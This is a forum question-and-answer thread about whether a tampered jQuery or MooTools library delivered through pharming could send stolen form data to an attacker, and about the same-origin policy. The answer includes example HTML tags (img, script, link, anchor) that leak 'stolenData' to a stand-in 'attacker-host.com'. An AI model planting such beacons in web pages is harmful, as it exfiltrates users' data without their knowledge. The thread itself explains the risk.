
An emulated jQuery or MooTools library (e.g. by pharming) can capture and send data to an external site?

There is a new fashion in calling jQuery, YUI, MooTools frameworks (and a lot of plugins too) from an external base site in order to work with the latest builds.

In a pharming attack (just to mention one) the original library can be replaced by an infected one in order to manipulate the behavior of the library, the browser or the plug-ins. It's easy to capture form data, querystrings and other info using those libraries. It's easy to send it too.

So my question is:

Can the attacker also send this captured data to the same pharming emulated host from which it obtained the fake library?

There's a cross-site JavaScript policy in the browser, but is it valid in this case? Remember that the fake library would be loaded from the same emulated host, and so would the infected page, so there's no call to cross-site DOM objects or functions.

Thanks a lot!


Well, you should think about the ways JavaScript can transmit data to another site:
- AJAX
- frames
- attaching an external URL to DOM objects
- WebSockets

In the first two cases, although there are some hacks, because of the same-origin policy it is not possible to transmit data from a site to another hosted on a different (sub)domain or using a different protocol. Even if the host is "poisoned" by "pharming", it doesn't mean that it will point to the same domain.
It is very easy to simply access an external URL and send any GET data to it, simply by attaching that URL to a DOM element that requires one:

<a href="http://attacker-host.com/?stolenData=stolenData"></a>
<img src="http://attacker-host.com/?stolenData=stolenData" />
<script src="http://attacker-host.com/?stolenData=stolenData"></script>
<link href="http://attacker-host.com/?stolenData=stolenData" />
<!-- ... and so on -->
If the attacker implements a WebSocket data transmitter and if you use a modern browser, the data exchange might work.

In conclusion, it can be done, although it would be a bit unlikely to sabotage a DNS and to modify JS libs in a way that the user could not tell.

EDIT: added the simplest solution: DOM objects
